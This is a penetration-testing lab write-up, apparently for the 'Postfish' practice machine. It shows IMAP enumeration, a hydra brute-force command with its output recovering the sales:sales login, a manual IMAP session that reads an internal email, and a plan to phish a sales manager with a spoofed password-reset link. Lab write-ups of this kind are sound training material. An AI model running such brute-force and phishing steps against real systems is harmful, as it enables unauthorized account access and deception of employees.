InfoSec LAB

Postfish_IMAP

Created: 4 min read

IMAP

Nmap discovered a IMAP service on the target ports 143 and 993 The running service is Dovecot imapd (Ubuntu)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ telnet $IP 143
Trying 192.168.111.137...
Connected to 192.168.111.137.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ openssl s_client -connect $IP:993 -crlf -quiet
Connecting to 192.168.111.137
Can't use SSL_get_servername
depth=0 CN=ubuntu
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN=ubuntu
verify return:1
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.

Connected, but a valid credential is required to further proceed

Brute-Force Attack

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ hydra -L valid_users.txt -P ./valid_users.txt imap://$IP/ -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-26 14:02:33
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 81 login tries (l:9/p:9), ~2 tries per task
[DATA] attacking imap://192.168.111.137:143/
[143][imap] host: 192.168.111.137   login: sales   password: sales
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-26 14:02:46

Using the valid_users.txt file from the SMTP enumeration earlier, found a valid credential; sales:sales

sales Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ telnet $IP 143
Trying 192.168.111.137...
Connected to 192.168.111.137.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS AUTH=PLAIN] Dovecot (Ubuntu) ready.
A1 LOGIN sales sales
A1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in

Authenticated

A1 LIST "" *
* LIST (\HasNoChildren) "/" INBOX
A1 OK List completed (0.053 + 0.000 + 0.052 secs).
 
A1 LIST INBOX *
* LIST (\HasNoChildren) "/" INBOX
A1 OK List completed (0.001 + 0.000 secs).
 
A1 LIST "Archive" *
A1 OK List completed (0.001 + 0.000 secs).
 
A1 LSUB "" *
A1 OK Lsub completed (0.001 + 0.000 secs).
 
A1 STATUS INBOX (MESSAGES UNSEEN RECENT)
* STATUS INBOX (MESSAGES 1 RECENT 1 UNSEEN 1)
A1 OK Status completed (0.001 + 0.000 secs).

There is a single email

A1 SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] First unseen.
* OK [UIDVALIDITY 1742994297] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
A1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).

Selecting INBOX

A1 FETCH 1 body[] 
* 1 FETCH (BODY[] {683}
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
	id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
	by postfish.off (Postfix) with SMTP id 7712145434
	for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off
 
Hi Sales team,
 
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
 
Regards,
IT
)
A1 OK Fetch completed (0.001 + 0.000 secs).

The mail is from the it user to the sales user that IT team will be sending out password reset links to register them on the ERP system. This would mean that a password reset link is expected from the it user. Given the brian.moore user is a Sales Manager, it might be possible to send a phishing email to the brian.moore user with a “password reset link” as the it user.

Interactive Graph View

Backlinks